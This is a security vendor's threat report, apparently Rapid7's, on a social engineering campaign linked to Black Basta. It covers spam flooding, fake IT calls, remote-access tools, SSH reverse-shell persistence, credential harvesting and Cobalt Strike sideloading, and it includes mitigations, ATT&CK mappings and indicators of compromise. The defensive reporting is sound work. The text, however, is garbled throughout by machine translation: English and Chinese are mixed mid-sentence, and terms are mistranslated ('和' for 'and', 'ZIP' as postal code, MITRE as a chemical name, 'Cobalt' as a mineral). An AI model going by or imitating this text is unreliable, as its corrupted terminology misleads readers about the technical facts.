最后更新于2024年5月28日星期二21:20:45 GMT
Co-authored by Rapid7 analysts Tyler McGraw, Thomas Elkins, 和 Evan McCann
执行概要
Rapid7 has identified an ongoing social engineering campaign that has been targeting multiple managed detection 和 response (耐多药) customers. The incident involves a threat actor overwhelming a user's email with junk 和 calling the user, 提供帮助. The threat actor prompts impacted users to download remote monitoring 和 management software like AnyDesk or utilize Microsoft's built-in Quick Assist feature in order to establish a remote connection. 一旦建立了远程连接, the threat actor moves to download payloads from their infrastructure in order to harvest the impacted users credentials 和 maintain persistence on the impacted users asset.
在一次事件中, Rapid7 observed the threat actor deploying Cobalt Strike beacons to other assets within the compromised network. While ransomware deployment was not observed in any of the cases Rapid7 responded to, the indicators of compromise we observed were previously linked with the Black Basta ransomware operators based on OSINT 和 other incident response engagements h和led by Rapid7.
概述
Since late April 2024, Rapid7 identified multiple cases of a novel social engineering campaign. The attacks begin with a group of users in the target environment receiving a large volume of spam emails. 在所有观察到的案例中, the spam was significant enough to overwhelm the email protection solutions in place 和 arrived in the user’s inbox. Rapid7 determined many of the emails themselves were not malicious, but rather consisted of newsletter sign-up confirmation emails from numerous legitimate organizations across the world.
随着邮件的发送, 和 the impacted users struggling to h和le the volume of the spam, the threat actor then began to cycle through calling impacted users posing as a member of their organization’s IT team reaching out to offer support for their email issues. 对每个用户来说, the threat actor attempted to socially engineer the user into providing remote access to their computer through the use of legitimate remote monitoring 和 management solutions. 在所有观察到的案例中, Rapid7 determined initial access was facilitated by either the download 和 execution of the commonly abused RMM solution AnyDesk, 或内置的Windows远程支持实用程序Quick Assist.
In the event the threat actor’s social engineering attempts were unsuccessful in getting a user to provide remote access, Rapid7 observed they immediately moved on to another user who had been targeted with their mass spam emails.
Once the threat actor successfully gains access to a user’s computer, 他们开始执行一系列批处理脚本, 作为更新呈现给用户, likely in an attempt to appear more legitimate 和 evade suspicion. The first batch script executed by the threat actor typically verifies connectivity to their comm和 和 control (C2) server 和 then downloads a 邮政编码 archive containing a legitimate copy of OpenSSH for Windows (ultimately renamed to ***RuntimeBroker.exe * * *), 以及它的依赖性, 几个RSA密钥, 和其他SSH配置文件. SSH is a protocol used to securely send comm和s to remote computers over the internet. While t在这里 are hard-coded C2 servers in many of the batch scripts, some are written so the C2 server 和 listening port can be specified on the comm和 line as an override.
然后是脚本 通过运行键项建立持久性 在Windows注册表中. The run keys created by the batch script point to additional batch scripts that are created at run time. Each batch script pointed to by the run keys executes SSH via PowerShell in an infinite loop to attempt to establish a reverse shell connection to the specified C2 server using the downloaded RSA private key. Rapid7 observed several different variations of the batch scripts used by the threat actor, some of which also conditionally establish persistence using other remote monitoring 和 management solutions, 包括NetSupport和ScreenConnect.
在所有观察到的案例中, Rapid7 has identified the usage of a batch script to harvest the victim’s credentials from the comm和 line using PowerShell. The credentials are gat在这里d under the false context of the “update” requiring the user to log in. 在大多数观察到的批处理脚本变化中, the credentials are immediately exfiltrated to the threat actor’s server via a Secure Copy comm和 (SCP). 在至少一个其他观察到的脚本变体中, credentials are saved to an archive 和 must be manually retrieved.
在一个观察到的案例中, 一旦初步妥协完成, the threat actor then attempted to move laterally throughout the environment via SMB using Impacket, 和 ultimately failed to deploy Cobalt Strike despite several attempts. While Rapid7 did not observe successful data exfiltration or ransomware deployment in any of our investigations, the indicators of compromise found via forensic analysis conducted by Rapid7 are consistent with the Black Basta ransomware group based on internal 和 open source intelligence.
法医分析
在一次事件中, Rapid7 observed the threat actor attempting to deploy additional remote monitoring 和 management tools including ScreenConnect 和 the NetSupport remote access trojan (RAT). Rapid7收购了Client32.ini文件, 它持有NetSupport RAT的配置数据, 包括用于连接的域. Rapid7 observed the NetSupport RAT attempt communication with the following domains:
- rewilivak13 [.] com
- greekpool [.] com
在成功访问受损资产后, Rapid7 observed the threat actor attempting to deploy Cobalt Strike beacons, 伪装成合法的动态链接库(DLL) 7z.DLL, to other assets within the same network as the compromised asset using the Impacket toolset.
在我们对 7z.DLL, Rapid7 observed the DLL was altered to include a function whose purpose was to XOR-decrypt the Cobalt Strike beacon using a hard-coded key 和 then execute the beacon.
The threat actor would attempt to deploy the Cobalt Strike beacon by executing the legitimate binary 7zG.Exe并传递命令行参数' b ', i.e. “C: \ \公共\ 7 zg用户.exe b”. 通过这样做,合法的二进制7zG.exe侧面负载 7z.DLL, 进而执行嵌入的Cobalt Strike信标. 这种技术被称为 DLL侧载的方法,Rapid7在之前的博客文章中讨论过 IDAT装载机.
Upon successful execution, Rapid7 observed the beacon inject a newly created process, 选择.exe.
缓解措施
Rapid7 recommends baselining your environment for all installed remote monitoring 和 management solutions 和 utilizing application allowlisting solutions, such as AppLocker or Microsoft Defender Application Control, to block all unapproved RMM solutions from executing within the environment. 例如,快速协助工具,quickassist.Exe,可以是 通过AppLocker阻止执行. 作为额外的预防措施, Rapid7 recommends blocking domains associated with all unapproved RMM solutions. 包含RMM解决方案目录的公共GitHub仓库, 它们的二进制名称, 并且可以找到相关的域 在这里.
Rapid7 recommends ensuring users are aware of established IT channels 和 communication methods to identify 和 prevent common social engineering attacks. We also recommend ensuring users are empowered to report suspicious phone calls 和 texts purporting to be from internal IT staff.
斜接丙氨酸&CK技术
| 策略 | 技术 | 过程 |
|---|---|---|
| 拒绝服务 | T1498:网络拒绝服务 | The threat actor overwhelms email protection solutions with spam. |
| 首次访问 | T1566.004网络钓鱼:鱼叉式网络钓鱼语音 | The threat actor calls impacted users 和 pretends to be a member of their organization’s IT team to gain remote access. |
| 执行 | T1059.003命令和脚本解释器:Windows命令Shell | The threat actor executes batch script after establishing remote access to a user’s asset. |
| 执行 | T1059.001命令和脚本解释器:PowerShell | Batch scripts used by the threat actor execute certain comm和s via PowerShell. |
| 持久性 | T1547.001: Boot or Logon Autostart 执行: Registry Run Keys / Startup Folder | The threat actor creates a run key to execute a batch script via PowerShell, 然后尝试通过SSH建立反向隧道. |
| 国防逃税 | T1222.001: 文件 和 导演y Permissions Modification: Windows 文件 和 导演y Permissions Modification | 威胁行为者使用呼叫.通过批处理脚本修改文件权限. |
| 国防逃税 | T1140:解混淆/解码文件或信息 | The threat actor encrypted several 邮政编码 archive payloads with the password “qaz123”. |
| 凭据访问 | T1056.001:输入捕获:键盘记录 | The threat actor runs a batch script that records the user’s password via comm和 line input. |
| 发现 | T1033:系统所有者/用户发现 | 威胁演员使用whoami.exe to evaluate if the impacted user is an administrator or not. |
| 横向运动 | T1570横向工具转移 | Impacket was used to move payloads between compromised systems. |
| 指挥与控制 | T1572:协议隧道 | An SSH reverse tunnel is used to provide the threat actor with persistent remote access. |
Rapid7客户
InsightIDR 和 管理检测和响应 customers have existing detection coverage through Rapid7's expansive library of detection rules. Rapid7 recommends installing the Insight Agent on all applicable hosts to ensure visibility into suspicious processes 和 proper detection coverage. Below is a non-exhaustive list of detections that are deployed 和 will alert on behavior related to this malware campaign:
| 检测 |
|---|
| 攻击者技术-重命名SSH为Windows |
| 持久性-运行键由Reg添加.exe |
| 可疑程序-未经批准的申请 |
| Suspicious Process - 7邮政编码 Executed From Users 导演y (*InsightIDR product only customers should evaluate 和 determine if they would like to activate this detection within the InsightIDR detection library; this detection is currently active for 耐多药/MTC customers) |
| Attacker 技术 - Enumerating Domain Or Enterprise Admins With Net Comm和 |
| 网络发现-通过网络的域控制器.exe |
妥协指标
基于网络的指标
| 域/ IPv4地址 | 笔记 |
|---|---|
| upd7 [.] com | 批处理脚本和远程访问工具主机. |
| upd7a [.] com | 批处理脚本和远程访问工具主机. |
| 195.123.233[.]55 | 批处理脚本中包含的C2服务器. |
| 38.180.142[.]249 | 批处理脚本中包含的C2服务器. |
| 5.161.245[.]155 | 批处理脚本中包含的C2服务器. |
| 20.115.96[.]90 | 批处理脚本中包含的C2服务器. |
| 91.90.195[.]52 | 批处理脚本中包含的C2服务器. |
| 195.123.233[.]42 | 批处理脚本中包含的C2服务器. |
| 15.235.218[.]150 | 攻击者使用的AnyDesk服务器. |
| greekpool [.] com | 主NetSupport RAT网关. |
| rewilivak13 [.] com | 备NetSupport RAT网关. |
| 77.246.101[.]135 | 用于通过AnyDesk连接的C2地址. |
| limitedtoday [.] com | 钴矿C2域. |
| thetrailbig [.)净 | 钴矿C2域. |
主机指标(hbi)
| 文件 | SHA256 | 笔记 |
|---|---|---|
| s.邮政编码 | C18E7709866F8B1A271A54407973152BE1036AD3B57423101D7C3DA98664D108 | Payload containing SSH config files used by the threat actor. |
| id_rsa | 59F1C5FE47C1733B84360A72E419A07315FBAE895DD23C1E32F1392E67313859 | 下载到受影响资产的RSA私钥. |
| id_rsa_client | 2EC12F4EE375087C921BE72F3BD87E6E12A2394E8E747998676754C9E3E9798E | 下载到受影响资产的RSA私钥. |
| authorized_keys | 35456F84BC88854F16E316290104D71A1F350E84B479EEBD6FBB2F77D36BCA8A | Authorized key downloaded to impacted assets by the threat actor. |
| RuntimeBroker.exe | 6F31CF7A11189C683D8455180B4EE6A60781D2E3F3AADF3ECC86F578D480CFA9 | 合法OpenSSH for Windows实用程序的重命名副本. |
| a.邮政编码 | A47718693DC12F061692212A354AFBA8CA61590D8C25511C50CFECF73534C750 | Payload that contains a batch script 和 the legitimate ScreenConnect setup executable. |
| a3.邮政编码 | 76F959205D0A0C40F3200E174DB6BB030A1FDE39B0A190B6188D9C10A0CA07C8 | 包含凭证收集批处理脚本. |
